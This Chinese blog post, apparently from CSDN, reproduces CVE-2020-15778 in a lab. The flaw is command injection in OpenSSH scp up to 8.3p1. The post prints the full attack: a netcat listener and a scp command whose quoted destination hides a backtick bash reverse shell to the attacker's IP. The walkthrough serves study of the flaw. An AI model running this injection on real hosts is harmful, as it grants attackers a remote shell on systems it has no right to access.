CVE-2020-15778:OpenSSH命令注入漏洞复现

本文介绍了一个OpenSSH的RCE漏洞,CVE-2020-15778,允许攻击者在scp传输文件时执行任意命令。复现步骤包括安装旧版本OpenSSH、利用scp注入命令并监听反弹shell。关键点在于scp间接调用SSH的利用方式,即使拥有用户名密码,也能在scp服务开启时进行攻击。
摘要由CSDN通过智能技术生成

声明

好好学习,天天向上

漏洞描述

OpenSSH是SSH(Secure SHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。

该漏洞编号CVE-2020-15778。OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。

影响范围

openssh <= openssh-8.3p1

复现过程

未安装ssh:

进行安装

sudo apt-get install openssh-client

已安装ssh:
ssh -V 查看版本信息,果然我的版本比较老了,毕竟靶机好久没升级

在这里插入图片描述

攻击机:192.168.239.139

靶机:192.168.239.129

前提条件,攻击者获取了靶机ssh的用户名密码,通过调用ssh,从而执行代码

攻击者监听端口

nc -lvvp 9999

在这里插入图片描述

拿到对方ssh用户名密码后,直接攻击

攻击者继续执行

scp /tmp/hello.txt root@192.168.239.129:'`bash -i >& /dev/tcp/192.168.239.139/9999 0>&1`'

需要输入ssh的密码,输入密码后直接反弹shell

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

要注意一点,有人可能觉得这个漏洞很鸡肋,已经拿到ssh的用户名和密码了,直接ssh进去不就好了,我们想一下调用过程,我们是通过scp调用ssh,完成RCE,如果用户关闭ssh,但是开启scp,那我们就可以用这种方式了

但是开启scp,那我们就可以用这种方式了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值